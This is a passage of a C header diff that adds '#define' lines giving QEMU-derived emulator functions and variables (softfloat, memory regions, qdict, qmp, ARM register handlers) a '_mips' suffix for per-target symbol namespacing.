int128_sub int128_sub_mips +#define int128_subfrom int128_subfrom_mips +#define int128_zero int128_zero_mips +#define int16_to_float32 int16_to_float32_mips +#define int16_to_float64 int16_to_float64_mips +#define int32_to_float128 int32_to_float128_mips +#define int32_to_float32 int32_to_float32_mips +#define int32_to_float64 int32_to_float64_mips +#define int32_to_floatx80 int32_to_floatx80_mips +#define int64_to_float128 int64_to_float128_mips +#define int64_to_float32 int64_to_float32_mips +#define int64_to_float64 int64_to_float64_mips +#define int64_to_floatx80 int64_to_floatx80_mips +#define invalidate_and_set_dirty invalidate_and_set_dirty_mips +#define invalidate_page_bitmap invalidate_page_bitmap_mips +#define io_mem_read io_mem_read_mips +#define io_mem_write io_mem_write_mips +#define io_readb io_readb_mips +#define io_readl io_readl_mips +#define io_readq io_readq_mips +#define io_readw io_readw_mips +#define iotlb_to_region iotlb_to_region_mips +#define io_writeb io_writeb_mips +#define io_writel io_writel_mips +#define io_writeq io_writeq_mips +#define io_writew io_writew_mips +#define is_a64 is_a64_mips +#define is_help_option is_help_option_mips +#define isr_read isr_read_mips +#define is_valid_option_list is_valid_option_list_mips +#define iwmmxt_load_creg iwmmxt_load_creg_mips +#define iwmmxt_load_reg iwmmxt_load_reg_mips +#define iwmmxt_store_creg iwmmxt_store_creg_mips +#define iwmmxt_store_reg iwmmxt_store_reg_mips +#define __jit_debug_descriptor __jit_debug_descriptor_mips +#define __jit_debug_register_code __jit_debug_register_code_mips +#define kvm_to_cpreg_id kvm_to_cpreg_id_mips +#define last_ram_offset last_ram_offset_mips +#define ldl_be_p ldl_be_p_mips +#define ldl_be_phys ldl_be_phys_mips +#define ldl_he_p ldl_he_p_mips +#define ldl_le_p ldl_le_p_mips +#define ldl_le_phys ldl_le_phys_mips +#define ldl_phys ldl_phys_mips +#define ldl_phys_internal ldl_phys_internal_mips +#define ldq_be_p ldq_be_p_mips +#define ldq_be_phys ldq_be_phys_mips +#define ldq_he_p ldq_he_p_mips +#define ldq_le_p ldq_le_p_mips +#define ldq_le_phys ldq_le_phys_mips +#define ldq_phys ldq_phys_mips +#define ldq_phys_internal ldq_phys_internal_mips +#define ldst_name ldst_name_mips +#define ldub_p ldub_p_mips +#define ldub_phys ldub_phys_mips +#define lduw_be_p lduw_be_p_mips +#define lduw_be_phys lduw_be_phys_mips +#define lduw_he_p lduw_he_p_mips +#define lduw_le_p lduw_le_p_mips +#define lduw_le_phys lduw_le_phys_mips +#define lduw_phys lduw_phys_mips +#define lduw_phys_internal lduw_phys_internal_mips +#define le128 le128_mips +#define linked_bp_matches linked_bp_matches_mips +#define listener_add_address_space listener_add_address_space_mips +#define load_cpu_offset load_cpu_offset_mips +#define load_reg load_reg_mips +#define load_reg_var load_reg_var_mips +#define log_cpu_state log_cpu_state_mips +#define lpae_cp_reginfo lpae_cp_reginfo_mips +#define lt128 lt128_mips +#define machine_class_init machine_class_init_mips +#define machine_finalize machine_finalize_mips +#define machine_info machine_info_mips +#define machine_initfn machine_initfn_mips +#define machine_register_types machine_register_types_mips +#define machvirt_init machvirt_init_mips +#define machvirt_machine_init machvirt_machine_init_mips +#define maj maj_mips +#define mapping_conflict mapping_conflict_mips +#define mapping_contiguous mapping_contiguous_mips +#define mapping_have_same_region mapping_have_same_region_mips +#define mapping_merge mapping_merge_mips +#define mem_add mem_add_mips +#define mem_begin mem_begin_mips +#define mem_commit mem_commit_mips +#define memory_access_is_direct memory_access_is_direct_mips +#define memory_access_size memory_access_size_mips +#define memory_init memory_init_mips +#define memory_listener_match memory_listener_match_mips +#define memory_listener_register memory_listener_register_mips +#define memory_listener_unregister memory_listener_unregister_mips +#define memory_map_init memory_map_init_mips +#define memory_mapping_filter memory_mapping_filter_mips +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_mips +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mips +#define memory_mapping_list_free memory_mapping_list_free_mips +#define memory_mapping_list_init memory_mapping_list_init_mips +#define memory_region_access_valid memory_region_access_valid_mips +#define memory_region_add_subregion memory_region_add_subregion_mips +#define memory_region_add_subregion_common memory_region_add_subregion_common_mips +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mips +#define memory_region_big_endian memory_region_big_endian_mips +#define memory_region_clear_pending memory_region_clear_pending_mips +#define memory_region_del_subregion memory_region_del_subregion_mips +#define memory_region_destructor_alias memory_region_destructor_alias_mips +#define memory_region_destructor_none memory_region_destructor_none_mips +#define memory_region_destructor_ram memory_region_destructor_ram_mips +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_mips +#define memory_region_dispatch_read memory_region_dispatch_read_mips +#define memory_region_dispatch_read1 memory_region_dispatch_read1_mips +#define memory_region_dispatch_write memory_region_dispatch_write_mips +#define memory_region_escape_name memory_region_escape_name_mips +#define memory_region_finalize memory_region_finalize_mips +#define memory_region_find memory_region_find_mips +#define memory_region_get_addr memory_region_get_addr_mips +#define memory_region_get_alignment memory_region_get_alignment_mips +#define memory_region_get_container memory_region_get_container_mips +#define memory_region_get_fd memory_region_get_fd_mips +#define memory_region_get_may_overlap memory_region_get_may_overlap_mips +#define memory_region_get_priority memory_region_get_priority_mips +#define memory_region_get_ram_addr memory_region_get_ram_addr_mips +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_mips +#define memory_region_get_size memory_region_get_size_mips +#define memory_region_info memory_region_info_mips +#define memory_region_init memory_region_init_mips +#define memory_region_init_alias memory_region_init_alias_mips +#define memory_region_initfn memory_region_initfn_mips +#define memory_region_init_io memory_region_init_io_mips +#define memory_region_init_ram memory_region_init_ram_mips +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_mips +#define memory_region_init_reservation memory_region_init_reservation_mips +#define memory_region_is_iommu memory_region_is_iommu_mips +#define memory_region_is_logging memory_region_is_logging_mips +#define memory_region_is_mapped memory_region_is_mapped_mips +#define memory_region_is_ram memory_region_is_ram_mips +#define memory_region_is_rom memory_region_is_rom_mips +#define memory_region_is_romd memory_region_is_romd_mips +#define memory_region_is_skip_dump memory_region_is_skip_dump_mips +#define memory_region_is_unassigned memory_region_is_unassigned_mips +#define memory_region_name memory_region_name_mips +#define memory_region_need_escape memory_region_need_escape_mips +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_mips +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_mips +#define memory_region_present memory_region_present_mips +#define memory_region_read_accessor memory_region_read_accessor_mips +#define memory_region_readd_subregion memory_region_readd_subregion_mips +#define memory_region_ref memory_region_ref_mips +#define memory_region_resolve_container memory_region_resolve_container_mips +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_mips +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_mips +#define memory_region_set_address memory_region_set_address_mips +#define memory_region_set_alias_offset memory_region_set_alias_offset_mips +#define memory_region_set_enabled memory_region_set_enabled_mips +#define memory_region_set_readonly memory_region_set_readonly_mips +#define memory_region_set_skip_dump memory_region_set_skip_dump_mips +#define memory_region_size memory_region_size_mips +#define memory_region_to_address_space memory_region_to_address_space_mips +#define memory_region_transaction_begin memory_region_transaction_begin_mips +#define memory_region_transaction_commit memory_region_transaction_commit_mips +#define memory_region_unref memory_region_unref_mips +#define memory_region_update_container_subregions memory_region_update_container_subregions_mips +#define memory_region_write_accessor memory_region_write_accessor_mips +#define memory_region_wrong_endianness memory_region_wrong_endianness_mips +#define memory_try_enable_merging memory_try_enable_merging_mips +#define module_call_init module_call_init_mips +#define module_load module_load_mips +#define mpidr_cp_reginfo mpidr_cp_reginfo_mips +#define mpidr_read mpidr_read_mips +#define msr_mask msr_mask_mips +#define mul128By64To192 mul128By64To192_mips +#define mul128To256 mul128To256_mips +#define mul64To128 mul64To128_mips +#define muldiv64 muldiv64_mips +#define neon_2rm_is_float_op neon_2rm_is_float_op_mips +#define neon_2rm_sizes neon_2rm_sizes_mips +#define neon_3r_sizes neon_3r_sizes_mips +#define neon_get_scalar neon_get_scalar_mips +#define neon_load_reg neon_load_reg_mips +#define neon_load_reg64 neon_load_reg64_mips +#define neon_load_scratch neon_load_scratch_mips +#define neon_ls_element_type neon_ls_element_type_mips +#define neon_reg_offset neon_reg_offset_mips +#define neon_store_reg neon_store_reg_mips +#define neon_store_reg64 neon_store_reg64_mips +#define neon_store_scratch neon_store_scratch_mips +#define new_ldst_label new_ldst_label_mips +#define next_list next_list_mips +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_mips +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_mips +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_mips +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_mips +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mips +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_mips +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_mips +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_mips +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mips +#define not_v6_cp_reginfo not_v6_cp_reginfo_mips +#define not_v7_cp_reginfo not_v7_cp_reginfo_mips +#define not_v8_cp_reginfo not_v8_cp_reginfo_mips +#define object_child_foreach object_child_foreach_mips +#define object_class_foreach object_class_foreach_mips +#define object_class_foreach_tramp object_class_foreach_tramp_mips +#define object_class_get_list object_class_get_list_mips +#define object_class_get_list_tramp object_class_get_list_tramp_mips +#define object_class_get_parent object_class_get_parent_mips +#define object_deinit object_deinit_mips +#define object_dynamic_cast object_dynamic_cast_mips +#define object_finalize object_finalize_mips +#define object_finalize_child_property object_finalize_child_property_mips +#define object_get_child_property object_get_child_property_mips +#define object_get_link_property object_get_link_property_mips +#define object_get_root object_get_root_mips +#define object_initialize_with_type object_initialize_with_type_mips +#define object_init_with_type object_init_with_type_mips +#define object_instance_init object_instance_init_mips +#define object_new_with_type object_new_with_type_mips +#define object_post_init_with_type object_post_init_with_type_mips +#define object_property_add_alias object_property_add_alias_mips +#define object_property_add_link object_property_add_link_mips +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_mips +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_mips +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_mips +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_mips +#define object_property_allow_set_link object_property_allow_set_link_mips +#define object_property_del object_property_del_mips +#define object_property_del_all object_property_del_all_mips +#define object_property_find object_property_find_mips +#define object_property_get object_property_get_mips +#define object_property_get_bool object_property_get_bool_mips +#define object_property_get_int object_property_get_int_mips +#define object_property_get_link object_property_get_link_mips +#define object_property_get_qobject object_property_get_qobject_mips +#define object_property_get_str object_property_get_str_mips +#define object_property_get_type object_property_get_type_mips +#define object_property_is_child object_property_is_child_mips +#define object_property_set object_property_set_mips +#define object_property_set_description object_property_set_description_mips +#define object_property_set_link object_property_set_link_mips +#define object_property_set_qobject object_property_set_qobject_mips +#define object_release_link_property object_release_link_property_mips +#define object_resolve_abs_path object_resolve_abs_path_mips +#define object_resolve_child_property object_resolve_child_property_mips +#define object_resolve_link object_resolve_link_mips +#define object_resolve_link_property object_resolve_link_property_mips +#define object_resolve_partial_path object_resolve_partial_path_mips +#define object_resolve_path object_resolve_path_mips +#define object_resolve_path_component object_resolve_path_component_mips +#define object_resolve_path_type object_resolve_path_type_mips +#define object_set_link_property object_set_link_property_mips +#define object_unparent object_unparent_mips +#define omap_cachemaint_write omap_cachemaint_write_mips +#define omap_cp_reginfo omap_cp_reginfo_mips +#define omap_threadid_write omap_threadid_write_mips +#define omap_ticonfig_write omap_ticonfig_write_mips +#define omap_wfi_write omap_wfi_write_mips +#define op_bits op_bits_mips +#define open_modeflags open_modeflags_mips +#define op_to_mov op_to_mov_mips +#define op_to_movi op_to_movi_mips +#define output_type_enum output_type_enum_mips +#define packFloat128 packFloat128_mips +#define packFloat16 packFloat16_mips +#define packFloat32 packFloat32_mips +#define packFloat64 packFloat64_mips +#define packFloatx80 packFloatx80_mips +#define page_find page_find_mips +#define page_find_alloc page_find_alloc_mips +#define page_flush_tb page_flush_tb_mips +#define page_flush_tb_1 page_flush_tb_1_mips +#define page_init page_init_mips +#define page_size_init page_size_init_mips +#define par par_mips +#define parse_array parse_array_mips +#define parse_error parse_error_mips +#define parse_escape parse_escape_mips +#define parse_keyword parse_keyword_mips +#define parse_literal parse_literal_mips +#define parse_object parse_object_mips +#define parse_optional parse_optional_mips +#define parse_option_bool parse_option_bool_mips +#define parse_option_number parse_option_number_mips +#define parse_option_size parse_option_size_mips +#define parse_pair parse_pair_mips +#define parser_context_free parser_context_free_mips +#define parser_context_new parser_context_new_mips +#define parser_context_peek_token parser_context_peek_token_mips +#define parser_context_pop_token parser_context_pop_token_mips +#define parser_context_restore parser_context_restore_mips +#define parser_context_save parser_context_save_mips +#define parse_str parse_str_mips +#define parse_type_bool parse_type_bool_mips +#define parse_type_int parse_type_int_mips +#define parse_type_number parse_type_number_mips +#define parse_type_size parse_type_size_mips +#define parse_type_str parse_type_str_mips +#define parse_value parse_value_mips +#define par_write par_write_mips +#define patch_reloc patch_reloc_mips +#define phys_map_node_alloc phys_map_node_alloc_mips +#define phys_map_node_reserve phys_map_node_reserve_mips +#define phys_mem_alloc phys_mem_alloc_mips +#define phys_mem_set_alloc phys_mem_set_alloc_mips +#define phys_page_compact phys_page_compact_mips +#define phys_page_compact_all phys_page_compact_all_mips +#define phys_page_find phys_page_find_mips +#define phys_page_set phys_page_set_mips +#define phys_page_set_level phys_page_set_level_mips +#define phys_section_add phys_section_add_mips +#define phys_section_destroy phys_section_destroy_mips +#define phys_sections_free phys_sections_free_mips +#define pickNaN pickNaN_mips +#define pickNaNMulAdd pickNaNMulAdd_mips +#define pmccfiltr_write pmccfiltr_write_mips +#define pmccntr_read pmccntr_read_mips +#define pmccntr_sync pmccntr_sync_mips +#define pmccntr_write pmccntr_write_mips +#define pmccntr_write32 pmccntr_write32_mips +#define pmcntenclr_write pmcntenclr_write_mips +#define pmcntenset_write pmcntenset_write_mips +#define pmcr_write pmcr_write_mips +#define pmintenclr_write pmintenclr_write_mips +#define pmintenset_write pmintenset_write_mips +#define pmovsr_write pmovsr_write_mips +#define pmreg_access pmreg_access_mips +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_mips +#define pmsav5_data_ap_read pmsav5_data_ap_read_mips +#define pmsav5_data_ap_write pmsav5_data_ap_write_mips +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_mips +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_mips +#define pmuserenr_write pmuserenr_write_mips +#define pmxevtyper_write pmxevtyper_write_mips +#define print_type_bool print_type_bool_mips +#define print_type_int print_type_int_mips +#define print_type_number print_type_number_mips +#define print_type_size print_type_size_mips +#define print_type_str print_type_str_mips +#define propagateFloat128NaN propagateFloat128NaN_mips +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_mips +#define propagateFloat32NaN propagateFloat32NaN_mips +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_mips +#define propagateFloat64NaN propagateFloat64NaN_mips +#define propagateFloatx80NaN propagateFloatx80NaN_mips +#define property_get_alias property_get_alias_mips +#define property_get_bool property_get_bool_mips +#define property_get_str property_get_str_mips +#define property_get_uint16_ptr property_get_uint16_ptr_mips +#define property_get_uint32_ptr property_get_uint32_ptr_mips +#define property_get_uint64_ptr property_get_uint64_ptr_mips +#define property_get_uint8_ptr property_get_uint8_ptr_mips +#define property_release_alias property_release_alias_mips +#define property_release_bool property_release_bool_mips +#define property_release_str property_release_str_mips +#define property_resolve_alias property_resolve_alias_mips +#define property_set_alias property_set_alias_mips +#define property_set_bool property_set_bool_mips +#define property_set_str property_set_str_mips +#define pstate_read pstate_read_mips +#define pstate_write pstate_write_mips +#define pxa250_initfn pxa250_initfn_mips +#define pxa255_initfn pxa255_initfn_mips +#define pxa260_initfn pxa260_initfn_mips +#define pxa261_initfn pxa261_initfn_mips +#define pxa262_initfn pxa262_initfn_mips +#define pxa270a0_initfn pxa270a0_initfn_mips +#define pxa270a1_initfn pxa270a1_initfn_mips +#define pxa270b0_initfn pxa270b0_initfn_mips +#define pxa270b1_initfn pxa270b1_initfn_mips +#define pxa270c0_initfn pxa270c0_initfn_mips +#define pxa270c5_initfn pxa270c5_initfn_mips +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_mips +#define qapi_dealloc_end_list qapi_dealloc_end_list_mips +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_mips +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_mips +#define qapi_dealloc_next_list qapi_dealloc_next_list_mips +#define qapi_dealloc_pop qapi_dealloc_pop_mips +#define qapi_dealloc_push qapi_dealloc_push_mips +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_mips +#define qapi_dealloc_start_list qapi_dealloc_start_list_mips +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_mips +#define qapi_dealloc_start_union qapi_dealloc_start_union_mips +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_mips +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_mips +#define qapi_dealloc_type_int qapi_dealloc_type_int_mips +#define qapi_dealloc_type_number qapi_dealloc_type_number_mips +#define qapi_dealloc_type_size qapi_dealloc_type_size_mips +#define qapi_dealloc_type_str qapi_dealloc_type_str_mips +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_mips +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_mips +#define qapi_free_boolList qapi_free_boolList_mips +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_mips +#define qapi_free_int16List qapi_free_int16List_mips +#define qapi_free_int32List qapi_free_int32List_mips +#define qapi_free_int64List qapi_free_int64List_mips +#define qapi_free_int8List qapi_free_int8List_mips +#define qapi_free_intList qapi_free_intList_mips +#define qapi_free_numberList qapi_free_numberList_mips +#define qapi_free_strList qapi_free_strList_mips +#define qapi_free_uint16List qapi_free_uint16List_mips +#define qapi_free_uint32List qapi_free_uint32List_mips +#define qapi_free_uint64List qapi_free_uint64List_mips +#define qapi_free_uint8List qapi_free_uint8List_mips +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_mips +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_mips +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_mips +#define qbool_destroy_obj qbool_destroy_obj_mips +#define qbool_from_int qbool_from_int_mips +#define qbool_get_int qbool_get_int_mips +#define qbool_type qbool_type_mips +#define qbus_create qbus_create_mips +#define qbus_create_inplace qbus_create_inplace_mips +#define qbus_finalize qbus_finalize_mips +#define qbus_initfn qbus_initfn_mips +#define qbus_realize qbus_realize_mips +#define qdev_create qdev_create_mips +#define qdev_get_type qdev_get_type_mips +#define qdev_register_types qdev_register_types_mips +#define qdev_set_parent_bus qdev_set_parent_bus_mips +#define qdev_try_create qdev_try_create_mips +#define qdict_add_key qdict_add_key_mips +#define qdict_array_split qdict_array_split_mips +#define qdict_clone_shallow qdict_clone_shallow_mips +#define qdict_del qdict_del_mips +#define qdict_destroy_obj qdict_destroy_obj_mips +#define qdict_entry_key qdict_entry_key_mips +#define qdict_entry_value qdict_entry_value_mips +#define qdict_extract_subqdict qdict_extract_subqdict_mips +#define qdict_find qdict_find_mips +#define qdict_first qdict_first_mips +#define qdict_flatten qdict_flatten_mips +#define qdict_flatten_qdict qdict_flatten_qdict_mips +#define qdict_flatten_qlist qdict_flatten_qlist_mips +#define qdict_get qdict_get_mips +#define qdict_get_bool qdict_get_bool_mips +#define qdict_get_double qdict_get_double_mips +#define qdict_get_int qdict_get_int_mips +#define qdict_get_obj qdict_get_obj_mips +#define qdict_get_qdict qdict_get_qdict_mips +#define qdict_get_qlist qdict_get_qlist_mips +#define qdict_get_str qdict_get_str_mips +#define qdict_get_try_bool qdict_get_try_bool_mips +#define qdict_get_try_int qdict_get_try_int_mips +#define qdict_get_try_str qdict_get_try_str_mips +#define qdict_haskey qdict_haskey_mips +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_mips +#define qdict_iter qdict_iter_mips +#define qdict_join qdict_join_mips +#define qdict_new qdict_new_mips +#define qdict_next qdict_next_mips +#define qdict_next_entry qdict_next_entry_mips +#define qdict_put_obj qdict_put_obj_mips +#define qdict_size qdict_size_mips +#define qdict_type qdict_type_mips +#define qemu_clock_get_us qemu_clock_get_us_mips +#define qemu_clock_ptr qemu_clock_ptr_mips +#define qemu_clocks qemu_clocks_mips +#define qemu_get_cpu qemu_get_cpu_mips +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_mips +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_mips +#define qemu_get_ram_block qemu_get_ram_block_mips +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_mips +#define qemu_get_ram_fd qemu_get_ram_fd_mips +#define qemu_get_ram_ptr qemu_get_ram_ptr_mips +#define qemu_host_page_mask qemu_host_page_mask_mips +#define qemu_host_page_size qemu_host_page_size_mips +#define qemu_init_vcpu qemu_init_vcpu_mips +#define qemu_ld_helpers qemu_ld_helpers_mips +#define qemu_log_close qemu_log_close_mips +#define qemu_log_enabled qemu_log_enabled_mips +#define qemu_log_flush qemu_log_flush_mips +#define qemu_loglevel_mask qemu_loglevel_mask_mips +#define qemu_log_vprintf qemu_log_vprintf_mips +#define qemu_oom_check qemu_oom_check_mips +#define qemu_parse_fd qemu_parse_fd_mips +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_mips +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_mips +#define qemu_ram_alloc qemu_ram_alloc_mips +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mips +#define qemu_ram_foreach_block qemu_ram_foreach_block_mips +#define qemu_ram_free qemu_ram_free_mips +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_mips +#define qemu_ram_ptr_length qemu_ram_ptr_length_mips +#define qemu_ram_remap qemu_ram_remap_mips +#define qemu_ram_setup_dump qemu_ram_setup_dump_mips +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_mips +#define qemu_real_host_page_size qemu_real_host_page_size_mips +#define qemu_st_helpers qemu_st_helpers_mips +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_mips +#define qemu_try_memalign qemu_try_memalign_mips +#define qentry_destroy qentry_destroy_mips +#define qerror_human qerror_human_mips +#define qerror_report qerror_report_mips +#define qerror_report_err qerror_report_err_mips +#define qfloat_destroy_obj qfloat_destroy_obj_mips +#define qfloat_from_double qfloat_from_double_mips +#define qfloat_get_double qfloat_get_double_mips +#define qfloat_type qfloat_type_mips +#define qint_destroy_obj qint_destroy_obj_mips +#define qint_from_int qint_from_int_mips +#define qint_get_int qint_get_int_mips +#define qint_type qint_type_mips +#define qlist_append_obj qlist_append_obj_mips +#define qlist_copy qlist_copy_mips +#define qlist_copy_elem qlist_copy_elem_mips +#define qlist_destroy_obj qlist_destroy_obj_mips +#define qlist_empty qlist_empty_mips +#define qlist_entry_obj qlist_entry_obj_mips +#define qlist_first qlist_first_mips +#define qlist_iter qlist_iter_mips +#define qlist_new qlist_new_mips +#define qlist_next qlist_next_mips +#define qlist_peek qlist_peek_mips +#define qlist_pop qlist_pop_mips +#define qlist_size qlist_size_mips +#define qlist_size_iter qlist_size_iter_mips +#define qlist_type qlist_type_mips +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_mips +#define qmp_input_end_list qmp_input_end_list_mips +#define qmp_input_end_struct qmp_input_end_struct_mips +#define qmp_input_get_next_type qmp_input_get_next_type_mips +#define qmp_input_get_object qmp_input_get_object_mips +#define qmp_input_get_visitor qmp_input_get_visitor_mips +#define qmp_input_next_list qmp_input_next_list_mips +#define qmp_input_optional qmp_input_optional_mips +#define qmp_input_pop qmp_input_pop_mips +#define qmp_input_push qmp_input_push_mips +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_mips +#define qmp_input_start_list qmp_input_start_list_mips +#define qmp_input_start_struct qmp_input_start_struct_mips +#define qmp_input_type_bool qmp_input_type_bool_mips +#define qmp_input_type_int qmp_input_type_int_mips +#define qmp_input_type_number qmp_input_type_number_mips +#define qmp_input_type_str qmp_input_type_str_mips +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_mips +#define qmp_input_visitor_new qmp_input_visitor_new_mips +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_mips +#define qmp_output_add_obj qmp_output_add_obj_mips +#define qmp_output_end_list qmp_output_end_list_mips +#define qmp_output_end_struct qmp_output_end_struct_mips +#define qmp_output_first qmp_output_first_mips +#define qmp_output_get_qobject qmp_output_get_qobject_mips +#define qmp_output_get_visitor qmp_output_get_visitor_mips +#define qmp_output_last qmp_output_last_mips +#define qmp_output_next_list qmp_output_next_list_mips +#define qmp_output_pop qmp_output_pop_mips +#define qmp_output_push_obj qmp_output_push_obj_mips +#define qmp_output_start_list qmp_output_start_list_mips +#define qmp_output_start_struct qmp_output_start_struct_mips +#define qmp_output_type_bool qmp_output_type_bool_mips +#define qmp_output_type_int qmp_output_type_int_mips +#define qmp_output_type_number qmp_output_type_number_mips +#define qmp_output_type_str qmp_output_type_str_mips +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_mips +#define qmp_output_visitor_new qmp_output_visitor_new_mips +#define qobject_decref qobject_decref_mips +#define qobject_to_qbool qobject_to_qbool_mips +#define qobject_to_qdict qobject_to_qdict_mips +#define qobject_to_qfloat qobject_to_qfloat_mips +#define qobject_to_qint qobject_to_qint_mips +#define qobject_to_qlist qobject_to_qlist_mips +#define qobject_to_qstring qobject_to_qstring_mips +#define qobject_type qobject_type_mips +#define qstring_append qstring_append_mips +#define qstring_append_chr qstring_append_chr_mips +#define qstring_append_int qstring_append_int_mips +#define qstring_destroy_obj qstring_destroy_obj_mips +#define qstring_from_escaped_str qstring_from_escaped_str_mips +#define qstring_from_str qstring_from_str_mips +#define qstring_from_substr qstring_from_substr_mips +#define qstring_get_length qstring_get_length_mips +#define qstring_get_str qstring_get_str_mips +#define qstring_new qstring_new_mips +#define qstring_type qstring_type_mips +#define ram_block_add ram_block_add_mips +#define ram_size ram_size_mips +#define range_compare range_compare_mips +#define range_covers_byte range_covers_byte_mips +#define range_get_last range_get_last_mips +#define range_merge range_merge_mips +#define ranges_can_merge ranges_can_merge_mips +#define raw_read raw_read_mips +#define raw_write raw_write_mips +#define rcon rcon_mips +#define read_raw_cp_reg read_raw_cp_reg_mips +#define recip_estimate recip_estimate_mips +#define recip_sqrt_estimate recip_sqrt_estimate_mips +#define register_cp_regs_for_features register_cp_regs_for_features_mips +#define register_multipage register_multipage_mips +#define register_subpage register_subpage_mips +#define register_tm_clones register_tm_clones_mips +#define register_types_object register_types_object_mips +#define regnames regnames_mips +#define render_memory_region render_memory_region_mips +#define reset_all_temps reset_all_temps_mips +#define reset_temp reset_temp_mips +#define rol32 rol32_mips +#define rol64 rol64_mips +#define ror32 ror32_mips +#define ror64 ror64_mips +#define roundAndPackFloat128 roundAndPackFloat128_mips +#define roundAndPackFloat16 roundAndPackFloat16_mips +#define roundAndPackFloat32 roundAndPackFloat32_mips +#define roundAndPackFloat64 roundAndPackFloat64_mips +#define roundAndPackFloatx80 roundAndPackFloatx80_mips +#define roundAndPackInt32 roundAndPackInt32_mips +#define roundAndPackInt64 roundAndPackInt64_mips +#define roundAndPackUint64 roundAndPackUint64_mips +#define round_to_inf round_to_inf_mips +#define run_on_cpu run_on_cpu_mips +#define s0 s0_mips +#define S0 S0_mips +#define s1 s1_mips +#define S1 S1_mips +#define sa1100_initfn sa1100_initfn_mips +#define sa1110_initfn sa1110_initfn_mips +#define save_globals save_globals_mips +#define scr_write scr_write_mips +#define sctlr_write sctlr_write_mips +#define set_bit set_bit_mips +#define set_bits set_bits_mips +#define set_default_nan_mode set_default_nan_mode_mips +#define set_feature set_feature_mips +#define set_float_detect_tininess set_float_detect_tininess_mips +#define set_float_exception_flags set_float_exception_flags_mips +#define set_float_rounding_mode set_float_rounding_mode_mips +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_mips +#define set_flush_to_zero set_flush_to_zero_mips +#define set_swi_errno set_swi_errno_mips +#define sextract32 sextract32_mips +#define sextract64 sextract64_mips +#define shift128ExtraRightJamming shift128ExtraRightJamming_mips +#define shift128Right shift128Right_mips +#define shift128RightJamming shift128RightJamming_mips +#define shift32RightJamming shift32RightJamming_mips +#define shift64ExtraRightJamming shift64ExtraRightJamming_mips +#define shift64RightJamming shift64RightJamming_mips +#define shifter_out_im shifter_out_im_mips +#define shortShift128Left shortShift128Left_mips +#define shortShift192Left shortShift192Left_mips +#define simple_mpu_ap_bits simple_mpu_ap_bits_mips +#define size_code_gen_buffer size_code_gen_buffer_mips +#define softmmu_lock_user softmmu_lock_user_mips +#define softmmu_lock_user_string softmmu_lock_user_string_mips +#define softmmu_tget32 softmmu_tget32_mips +#define softmmu_tget8 softmmu_tget8_mips +#define softmmu_tput32 softmmu_tput32_mips +#define softmmu_unlock_user softmmu_unlock_user_mips +#define sort_constraints sort_constraints_mips +#define sp_el0_access sp_el0_access_mips +#define spsel_read spsel_read_mips +#define spsel_write spsel_write_mips +#define start_list start_list_mips +#define stb_p stb_p_mips +#define stb_phys stb_phys_mips +#define stl_be_p stl_be_p_mips +#define stl_be_phys stl_be_phys_mips +#define stl_he_p stl_he_p_mips +#define stl_le_p stl_le_p_mips +#define stl_le_phys stl_le_phys_mips +#define stl_phys stl_phys_mips +#define stl_phys_internal stl_phys_internal_mips +#define stl_phys_notdirty stl_phys_notdirty_mips +#define store_cpu_offset store_cpu_offset_mips +#define store_reg 